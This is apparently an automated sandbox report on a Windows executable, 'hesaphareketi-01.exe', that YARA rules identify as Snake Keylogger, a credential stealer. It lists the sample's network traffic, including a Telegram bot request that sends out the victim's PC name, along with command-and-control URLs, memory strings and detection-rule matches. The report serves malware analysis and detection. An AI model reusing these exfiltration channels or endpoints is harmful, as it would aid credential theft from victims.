Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:581804%0D%0ADate%20and%20Time:%2003/10/2024%20/%2019:12:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20581804%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.obaambalaj.com.tr

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 03 Oct 2024 07:11:36 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E8C000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.obaambalaj.com.tr
Source: hesaphareketi-01.exe, 00000000.00000002.1457581741.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:581804%0D%0ADate%20a
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D99000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/(
Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49732 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: hesaphareketi-01.exe PID: 5860, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: hesaphareketi-01.exe PID: 5508, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 0_2_0133D5DC	0_2_0133D5DC
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 0_2_02D16FE8	0_2_02D16FE8
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 0_2_02D10040	0_2_02D10040
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 0_2_02D10007	0_2_02D10007
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 0_2_02D16FD8	0_2_02D16FD8
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 0_2_06F64578	0_2_06F64578
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 0_2_06F607C0	0_2_06F607C0
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 0_2_06F607AF	0_2_06F607AF
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 0_2_06F694D8	0_2_06F694D8
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 0_2_06F64568	0_2_06F64568
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 0_2_06F60278	0_2_06F60278
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 0_2_06F60268	0_2_06F60268
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 0_2_06F6708A	0_2_06F6708A
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 0_2_06F699E8	0_2_06F699E8
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 0_2_06F67930	0_2_06F67930
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_011DC146	4_2_011DC146
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_011D5362	4_2_011D5362
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_011DD278	4_2_011DD278
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_011DC468	4_2_011DC468
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_011DC738	4_2_011DC738
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_011DE988	4_2_011DE988
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_011D69A0	4_2_011D69A0
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_011D29E0	4_2_011D29E0
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_011DCA08	4_2_011DCA08
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_011D9DE0	4_2_011D9DE0
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_011DCCD8	4_2_011DCCD8
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_011DCFAA	4_2_011DCFAA
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_011D6FC8	4_2_011D6FC8
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_011D3E09	4_2_011D3E09
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_011DF979	4_2_011DF979
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_011DE97A	4_2_011DE97A
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_0567D710	4_2_0567D710
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_056770C0	4_2_056770C0
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05673560	4_2_05673560
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05674500	4_2_05674500
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_056725C0	4_2_056725C0
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05676DA0	4_2_05676DA0
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05671C60	4_2_05671C60
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05676440	4_2_05676440
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05672C00	4_2_05672C00
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05670CC0	4_2_05670CC0
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_056754A0	4_2_056754A0
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05676760	4_2_05676760
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05676750	4_2_05676750
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05672F20	4_2_05672F20
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05670FE0	4_2_05670FE0
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_056757C0	4_2_056757C0
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05671F80	4_2_05671F80
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05674E60	4_2_05674E60
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_0567EE48	4_2_0567EE48
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05671620	4_2_05671620
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_0567EE3B	4_2_0567EE3B
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05675E00	4_2_05675E00
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05673EC0	4_2_05673EC0
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05670680	4_2_05670680
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05671940	4_2_05671940
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05676120	4_2_05676120
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_056741E0	4_2_056741E0
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_056799C8	4_2_056799C8
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_056709A0	4_2_056709A0
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05675180	4_2_05675180
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05670040	4_2_05670040
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05674820	4_2_05674820
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05670006	4_2_05670006
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_056728E0	4_2_056728E0
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05673880	4_2_05673880
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05670360	4_2_05670360
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05674B40	4_2_05674B40
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05670350	4_2_05670350
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05671300	4_2_05671300
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05673BA0	4_2_05673BA0
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05676A70	4_2_05676A70
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05673240	4_2_05673240
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05675AE0	4_2_05675AE0
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_056722A0	4_2_056722A0
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_05676A80	4_2_05676A80

Source: hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs hesaphareketi-01.exe
Source: hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs hesaphareketi-01.exe
Source: hesaphareketi-01.exe, 00000000.00000000.1432378454.0000000000902000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenametEaO.exeH vs hesaphareketi-01.exe
Source: hesaphareketi-01.exe, 00000000.00000002.1461505822.00000000072B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs hesaphareketi-01.exe
Source: hesaphareketi-01.exe, 00000000.00000002.1457581741.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs hesaphareketi-01.exe
Source: hesaphareketi-01.exe, 00000000.00000002.1445396850.00000000010DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs hesaphareketi-01.exe
Source: hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000446000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs hesaphareketi-01.exe
Source: hesaphareketi-01.exe, 00000004.00000002.3893621321.00000000009B7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs hesaphareketi-01.exe
Source: hesaphareketi-01.exe	Binary or memory string: OriginalFilenametEaO.exeH vs hesaphareketi-01.exe

Source: hesaphareketi-01.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
